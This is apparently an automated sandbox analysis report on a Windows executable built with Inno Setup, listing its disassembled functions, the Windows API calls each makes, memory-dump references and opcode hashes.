                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                                                                      • Instruction ID: 866207c2a99293721dc17515f5e31636ca325c5e587501d47fbe5ff4e718b97c
                                                                                                      • Opcode Fuzzy Hash: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                                                                      • Instruction Fuzzy Hash: 77C08CE03222001A9A20A6BD2CC950F06CC891437A3A41F77B439E72E2D23DD8162018
                                                                                                      Function 00466EAC Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 2492992576-0
                                                                                                      • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                      • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                      • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                      • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                      Function 00406EC8 Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 823142352-0
                                                                                                      • Opcode ID: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                                                                      • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                      • Opcode Fuzzy Hash: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                                                                      • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                      Function 00450918 Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                                                        • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 734332943-0
                                                                                                      • Opcode ID: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                                                                      • Instruction ID: d892f33e09ba9bc7304af59ed1bd982b4427bde6cd355302a364b0e8927efaaf
                                                                                                      • Opcode Fuzzy Hash: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                                                                      • Instruction Fuzzy Hash: 2DC04CA9300101879F00BAAE95D190663D85E583057504066B944CF207D668D8144A18
                                                                                                      Function 004072B0 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentDirectory
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611563598-0
                                                                                                      • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                                      • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                                                      • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                                                      • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                                                      Function 0042E3FF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(?,0042E41D), ref: 0042E410
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 2340568224-0
                                                                                                      • Opcode ID: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                                                      • Instruction ID: 55140b1eedf56d48a55774d01a07de49d55d18186a895614534630d02c3c9fff
                                                                                                      • Opcode Fuzzy Hash: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                                                      • Instruction Fuzzy Hash: D4B09B7671C6105DFB05D695745152D63D4D7C57203E14577F010D7580D53D58004D18
                                                                                                      Function 004165FC Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                                      • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                                                      • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                                                      • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                                                      Function 00448738 Relevance: 1.4, APIs: 1, Instructions: 158COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                                                                      • Instruction ID: 3a42617683b163d9d3e29dc322e321d1f787465d7b697eb1a78dfeb7447b1e7e
                                                                                                      • Opcode Fuzzy Hash: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                                                                      • Instruction Fuzzy Hash: CB518574E042099FEB01EFA9C892AAEBBF5EF49314F50417AE500E7351DB389D45CB98
                                                                                                      Function 0047DA48 Relevance: 1.4, APIs: 1, Instructions: 150COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047DC20,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DBDA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide
                                                                                                      • String ID:
                                                                                                      • API String ID: 626452242-0
                                                                                                      • Opcode ID: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                                                                      • Instruction ID: a4a2cf2857c8d8ea8b604d5a3bb359359cf50968c17c86877c7e7666634e0114
                                                                                                      • Opcode Fuzzy Hash: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                                                                      • Instruction Fuzzy Hash: 79519C30A04248AFDB20DF65D8C5BAABBB8EB18304F118077E804A73A1D778AD45CB59
                                                                                                      Function 0041F3D4 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                                                                      • Instruction ID: 6bd7adec2090487eae29abc1928bf57af59456791c97a49d6ef8c5917aacc84c
                                                                                                      • Opcode Fuzzy Hash: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                                                                      • Instruction Fuzzy Hash: 0E1148742007069BC710DF19D880B86FBE5EB98390B10C53BE9588B385D374E8558BA9
                                                                                                      Function 00452FB0 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(00000000,00453019), ref: 00452FFB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 1452528299-0
                                                                                                      • Opcode ID: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
                                                                                                      • Instruction ID: 3702fe8876d82bde104835ae14f19b545f9b4323f369928b31ff8c7c86e788f0
                                                                                                      • Opcode Fuzzy Hash: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
                                                                                                      • Instruction Fuzzy Hash: 32014C356043086A8B10CF69AC004AEFBE8DB4D7217108277FC14D3382DA744E0496E4
                                                                                                      Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00003640,00007643,00401973), ref: 00401766
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 1263568516-0
                                                                                                      • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                      • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                                      • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                      • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                                      Function 00406F50 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
                                                                                                      • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                      • Opcode Fuzzy Hash: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
                                                                                                      • Instruction Fuzzy Hash:

                                                                                                      Non-executed Functions

                                                                                                      Function 0041F128 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                                      • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                                      • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                                      • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                                      • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                                      • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                                      • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                      • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                      • API String ID: 2323315520-3614243559
                                                                                                      • Opcode ID: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
                                                                                                      • Instruction ID: d5058fc073e0ad59750b6b6eed82d26134d8568d962b0a84cfd108907e917b52
                                                                                                      • Opcode Fuzzy Hash: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
                                                                                                      • Instruction Fuzzy Hash: 8D310DB2640700EBEB01EBB9AC86A663294F728724745093FB508DB192D77C5C49CB1C
                                                                                                      Function 0045892C Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00458993
                                                                                                      • QueryPerformanceCounter.KERNEL32(02073858,00000000,00458C26,?,?,02073858,00000000,?,00459322,?,02073858,00000000), ref: 0045899C
                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(02073858,02073858), ref: 004589A6
                                                                                                      • GetCurrentProcessId.KERNEL32(?,02073858,00000000,00458C26,?,?,02073858,00000000,?,00459322,?,02073858,00000000), ref: 004589AF
                                                                                                      • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458A25
                                                                                                      • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02073858,02073858), ref: 00458A33
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458A7B
                                                                                                      • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00458BD1,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458AB4
                                                                                                        • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                      • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458B5D
                                                                                                      • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00458B93
                                                                                                      • CloseHandle.KERNEL32(000000FF,00458BD8,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458BCB
                                                                                                        • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                      • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                      • API String ID: 770386003-3271284199
                                                                                                      • Opcode ID: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
                                                                                                      • Instruction ID: 46381a2ef6f5f7687f8d932114089cfc0a3b3023078b53c1614b04e084b280c9
